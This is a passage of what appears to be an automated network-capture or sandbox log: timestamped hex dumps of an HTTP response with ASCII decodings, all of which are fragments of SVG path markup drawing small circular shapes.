                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5033INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5049INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5065INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                                                        Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5084INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                                                        Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5100INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5116INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5132INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                                                        Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5148INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5164INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5180INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5196INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5212INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                                        Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5228INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5244INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5260INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                                                        Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5276INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5292INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
